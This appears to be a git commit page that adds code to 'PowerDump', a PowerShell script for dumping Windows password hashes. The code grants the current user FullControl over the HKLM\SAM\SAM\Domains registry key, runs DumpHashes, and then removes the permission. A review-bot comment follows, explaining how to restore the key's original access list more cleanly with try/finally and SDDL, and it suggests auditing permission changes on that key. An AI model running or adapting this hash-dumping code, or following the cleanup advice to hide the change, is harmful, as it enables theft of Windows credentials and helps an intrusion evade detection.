Add token fiddling from nishang

bug/bundler_fix
Meatballs 2014-11-28 23:02:59 +00:00
parent 7ea3cd1b61
commit f5f32fac06
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 25 additions and 0 deletions


@ -1,3 +1,6 @@
# PowerDump by David Kennedy Copyright 2014 The Social-Engineer Toolkit
# https://github.com/trustedsec/social-engineer-toolkit
# User Token Code by Nikhil Mitt ttps://github.com/samratashok/nishang
function LoadApi function LoadApi
{ {
$oldErrorAction = $global:ErrorActionPreference; $oldErrorAction = $global:ErrorActionPreference;
@ -354,4 +357,26 @@ function DumpHashes
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower()); [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
} }
} }
#Set permissions for the current user.
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
$key.SetAccessControl($acl)
DumpHashes DumpHashes
#Remove the permissions added above.
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl
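Review bot: The cleanup after `DumpHashes` in the second hunk is neither guaranteed to run nor a true restore. If `DumpHashes` throws, the FullControl rule granted on `HKLM\SAM\SAM\Domains` stays in place. The `where`/`RemoveAccessRule` pipeline also strips every explicit rule for the current identity rather than only the one added, and `SetAccessRule` will already have replaced any earlier allow rule for that identity, so the host ends up with a different DACL on the SAM key than it started with. Capture the descriptor first with `$sddl = $acl.GetSecurityDescriptorSddlForm('Access')`, run the call as `try { DumpHashes } finally { ... }`, and in the `finally` block write `$sddl` back with `SetSecurityDescriptorSddlForm` and call `$key.Close()`. For anyone examining a host afterwards, a permission change on that key is the artefact this code leaves, so auditing DACL changes under `HKLM\SAM` is worth having in place.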